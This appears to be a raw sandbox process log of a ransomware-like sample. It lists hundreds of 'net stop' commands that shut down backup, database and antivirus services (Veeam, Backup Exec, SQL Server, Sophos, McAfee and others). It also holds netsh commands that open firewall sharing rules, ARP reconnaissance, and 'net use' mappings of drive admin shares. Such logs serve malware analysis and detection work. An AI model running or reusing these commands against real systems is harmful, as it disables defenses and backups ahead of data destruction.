C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y3⤵PID:5748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y4⤵PID:5208
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y3⤵PID:5384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y4⤵PID:5912
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y3⤵PID:4108
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y3⤵PID:4160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵PID:4668
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y3⤵PID:4712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y4⤵PID:4340
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y3⤵PID:6068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y4⤵PID:5024
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y3⤵PID:4740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y4⤵PID:4604
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:4780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y4⤵PID:4108
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y3⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵PID:5592
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y3⤵PID:5128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y4⤵PID:4828
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y3⤵PID:4756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵PID:6072
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y3⤵PID:4128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y4⤵PID:4844
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y4⤵PID:2200
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵PID:5856
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y3⤵PID:4944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y4⤵PID:4504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y3⤵PID:5240
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y3⤵PID:4272
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y3⤵PID:3368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y4⤵PID:4540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y5⤵PID:5660
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y3⤵PID:4500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y4⤵PID:2152
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y3⤵PID:4860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y4⤵PID:4924
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y3⤵PID:4184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y4⤵PID:5680
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y3⤵PID:3828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y4⤵PID:5724
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y3⤵PID:1172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y4⤵PID:4024
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y3⤵PID:5284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y4⤵PID:5188
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y3⤵PID:5612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y4⤵PID:5808
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y3⤵PID:5980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y4⤵PID:4476
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y3⤵PID:5860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y4⤵PID:5996
-
-
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y3⤵PID:4896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y4⤵PID:1232
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y3⤵PID:4968
-
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y3⤵PID:5312
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y3⤵PID:5768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y4⤵PID:5564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y5⤵PID:5008
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y3⤵PID:4220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y4⤵PID:6004
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y3⤵PID:5620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y4⤵PID:5600
-
-
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y3⤵PID:5928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y4⤵PID:5696
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵PID:5804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵PID:5416
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:5208
-
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y3⤵PID:6000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y4⤵PID:5628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y3⤵PID:6016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y4⤵PID:4468
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y3⤵PID:2844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y4⤵PID:5644
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y3⤵PID:4464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y4⤵PID:3440
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y3⤵PID:4992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y4⤵PID:5888
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y3⤵PID:4228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y4⤵PID:4988
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y3⤵PID:5040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y4⤵PID:5036
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y3⤵PID:5316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵PID:4812
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y3⤵PID:4472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y4⤵PID:4624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y5⤵PID:4844
-
-
-
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y3⤵PID:4532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y4⤵PID:612
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵PID:5048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵PID:5516
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y3⤵PID:4592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y4⤵PID:4536
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y3⤵PID:6132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y4⤵PID:5192
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y3⤵PID:4356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y4⤵PID:4660
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y3⤵PID:4540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y4⤵PID:5804
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y3⤵PID:4376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y4⤵PID:5864
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y3⤵PID:4344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y4⤵PID:5832
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y3⤵PID:5648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y4⤵PID:5676
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y3⤵PID:5716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y4⤵PID:5748
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y3⤵PID:3956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y4⤵PID:5384
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y3⤵PID:4712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y4⤵PID:6068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y3⤵PID:5652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y4⤵PID:4612
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y3⤵PID:5468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y4⤵PID:3716
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y3⤵PID:6044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y4⤵PID:5912
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y3⤵PID:4556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y4⤵PID:5200
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y3⤵PID:2256
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y3⤵PID:5168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y4⤵PID:4152
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:5228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y4⤵PID:5340
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y3⤵PID:4388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y4⤵PID:4792
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y4⤵PID:4468
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y3⤵PID:2292
-
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y3⤵PID:4880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y4⤵PID:2140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y3⤵PID:588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y4⤵PID:3484
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y3⤵PID:4544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y4⤵PID:5116
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:4312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y4⤵PID:4400
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y3⤵PID:4988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y4⤵PID:4196
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y3⤵PID:5844
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y3⤵PID:5972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y4⤵PID:4924
-
-
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y3⤵PID:4796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y4⤵PID:4536
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y3⤵PID:4624
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y3⤵PID:4360
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y3⤵PID:5680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y4⤵PID:4368
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /4⤵PID:5328
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y3⤵PID:5660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y4⤵PID:5940
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y3⤵PID:4512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y4⤵PID:6076
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y3⤵PID:4244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y4⤵PID:4836
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y3⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y4⤵PID:5384
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y3⤵PID:5832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y4⤵PID:4780
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y3⤵PID:4892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y4⤵PID:1172
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y3⤵PID:4656
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y3⤵PID:5856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y4⤵PID:4608
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y3⤵PID:4948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y4⤵PID:4824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y3⤵PID:4804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y4⤵PID:5176
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y3⤵PID:5992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y4⤵PID:6064
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y3⤵PID:2836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y4⤵PID:5984
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y3⤵PID:1228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y4⤵PID:5500
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y3⤵PID:5000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y4⤵PID:4640
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y3⤵PID:1332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y4⤵PID:5704
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y3⤵PID:5148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y4⤵PID:5716
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y3⤵PID:5564
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y3⤵PID:6112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y4⤵PID:4472
-
-
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y3⤵PID:6048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y4⤵PID:6132
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y3⤵PID:2292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y4⤵PID:3440
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y3⤵PID:5040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y4⤵PID:6040
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y3⤵PID:4540
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y3⤵PID:1176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y4⤵PID:4868
-
-
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y3⤵PID:4560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y4⤵PID:4596
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y3⤵PID:5888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y4⤵PID:4988
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y4⤵PID:5676
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y3⤵PID:4412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y4⤵PID:4648
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y3⤵PID:3964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y4⤵PID:612
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y4⤵PID:5388
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y3⤵PID:6032
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y3⤵PID:4952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y4⤵PID:5616
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵PID:5248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵PID:5724
-
-
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y3⤵PID:1144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y4⤵PID:4148
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y3⤵PID:1972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y4⤵PID:1172
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y3⤵PID:5776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y4⤵PID:4488
-
-
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y3⤵PID:4800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y4⤵PID:5908
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /3⤵PID:5680
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y3⤵PID:4204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y4⤵PID:5868
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:5324
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y3⤵PID:5400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y4⤵PID:5540
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y3⤵PID:4128
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵PID:5240
-
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y3⤵PID:4620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y4⤵PID:2204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y3⤵PID:2484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y4⤵PID:2856
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵PID:5984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵PID:6120
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y3⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y4⤵PID:2268
-
-
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y3⤵PID:5720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y4⤵PID:252
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y3⤵PID:5556
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y3⤵PID:5296
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y3⤵PID:4912
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y3⤵PID:4704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y4⤵PID:5560
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y3⤵PID:2256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y4⤵PID:4136
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y3⤵PID:4424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y4⤵PID:4472
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y3⤵PID:5888
-
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y3⤵PID:4108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y4⤵PID:5556
-
-
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y3⤵PID:6132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y4⤵PID:5844
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y3⤵PID:5344
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y3⤵PID:5928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y4⤵PID:4792
-
-
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y3⤵PID:5140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y4⤵PID:3484
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y3⤵PID:4444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y4⤵PID:4812
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵PID:4880
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y3⤵PID:5032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y4⤵PID:4536
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y3⤵PID:4700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y4⤵PID:5624
-
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵PID:5116
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y3⤵PID:6108
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\Users3⤵PID:4764
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\A$3⤵PID:5088
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\B$3⤵PID:5280
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\C$3⤵PID:5636
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\D$3⤵PID:4524
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\E$3⤵PID:4244
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\F$3⤵PID:4944
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\G$3⤵PID:5708
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\H$3⤵PID:1752
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\I$3⤵PID:4876
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\J$3⤵PID:4116
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\K$3⤵PID:2220
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\L$3⤵PID:5764
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\M$3⤵PID:5888
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\N$3⤵PID:4204
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\O$3⤵PID:6032
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\P$3⤵PID:4560
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\Q$3⤵PID:4384
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\R$3⤵PID:5300
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\S$3⤵PID:2268
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\T$3⤵PID:6064
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\U$3⤵PID:3372
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\V$3⤵PID:4732
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y3⤵PID:6120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y4⤵PID:4616
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵PID:4544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵PID:4464
-
-
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.1\W$3⤵PID:2312
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y3⤵PID:6044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y4⤵PID:4712
-
